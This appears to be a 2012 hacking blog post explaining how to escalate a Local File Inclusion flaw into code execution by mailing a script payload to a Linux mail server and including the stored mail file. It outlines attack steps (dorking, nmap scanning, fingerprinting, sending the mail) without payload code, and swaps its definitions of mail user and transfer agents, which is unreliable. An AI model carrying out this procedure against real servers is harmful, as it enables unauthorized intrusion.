Wednesday, 25 January 2012

Ordering Remote File inclusion via e-mail

I just briefly discussed Local File Inclusion in this article and more importantly to that you can use to turn an LFI into an Remote File Inclusion (or Remote Code injection)

This method, abuses the way e-mail is stored on Linux servers, (when a certain kind of Mail Delivery Agent is in use) and helps to propagate a RFI attack on a server with a LFI vulnerability, or create an RFI attack vector when one doesn't exist


Before I can get into the actual attack, I need to talk a little about how email actually works in terms of the applications that facilitate emailing, understanding the nature of these programs will help you discover attacks like this in the future.

How it all works
How the hell does this work?? Well, e-mail works by using three components

  • Mail User Agent -- Within Internet message handling services (MHS), a message transfer agent[1] or mail transfer agent[2] (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using a client–server application architecture. An MTA implements both the client (sending) and server (receiving) portions of the Simple Mail Transfer Protocol.[3]
  • Mail Transfer Agent -- The term can refer to any system capable of accessing the user's email mailbox, regardless of it being a mail user agent, a relaying server, or a human typing on a terminal --- Wikipedia
  • Mail Delivery Agent -- A mail delivery agent or message delivery agent (MDA) is a computer software component that is responsible for the delivery of e-mail messages to a local recipient's mailbox.[1] Also called an LDA, or local delivery agent.[2] --- Wikipedia

We are interested in the Mail Delivery Client and how it behaves. There are a lot of delivery agents out there, all handling the job in different ways, the ones that will help us out are those that store mail in file form. I suggest you read about them a little, so you know what calls to make if you are looking for RFIs on a mail/web server!

How can e-mail be dangerous??
...besides the obvious ways ofcourse :)

Well when someone sends mail a user on a mail Linux server, all this means (depending on the program receiving the mail) is a file with gets written into some folder where the program that reads the file can find it for the user, naturally you can imagine that modern security conventions will have to so that:

  • Only the user,its group and anyone with root permissions will be able to read the file
  • The mail reader program will only be able to read mail belonging to the person that executes it
the point being, nothing prevents the user from reading the file!

So how is this an exploit then?? The above points don't deter the attack at all! Infact if anything it helps us out! We need the user we are exploiting in this case www-data (or apache or what ever you're web server is called on your system) to be able to read the file, other wise the attack would never work!

What we will do is send a mail containing content that the scripting engine running on the server will interpret as a web script, thus making a simple e-mail into a remote file injection!

So when exactly is this kind of thing possible?

  • When you can have you mail stored on the server, in a readable file!
this may be an issue that could stop your attack, but this method is just a proposal to creating RFI vulnerabilities! One thing that is good, is that STMP exploits do exist and because of this idea, STMP exploits are at times to be considered RFI exploits as well (this is the whole reason i decided to post this!)

To Exploit...

The attack protocol is simple:
  1. Find a LFI vector --- dorking, CMS exploits , bruteforcing
  2. Port scan the host --- determine that it is infact a mail server (whip out your nmap) 'nmap -sV [host]'
  3. Fingerprint the Mail server species--- via nmap output, or what ever you need to do this with
    1. Find out where it stores the mail files --- do some research on the Mail server
    2. and if the mail is stored in a readable file (no database,binary,obfuscated or encrypted files will do!
  4. Send the malicious mail --- for this you need to know the web server username usually something like www-data,apache,etc you would need to read about the OS and server species to determine this
  5. Include the mail file as a payload in the LFI vulnerability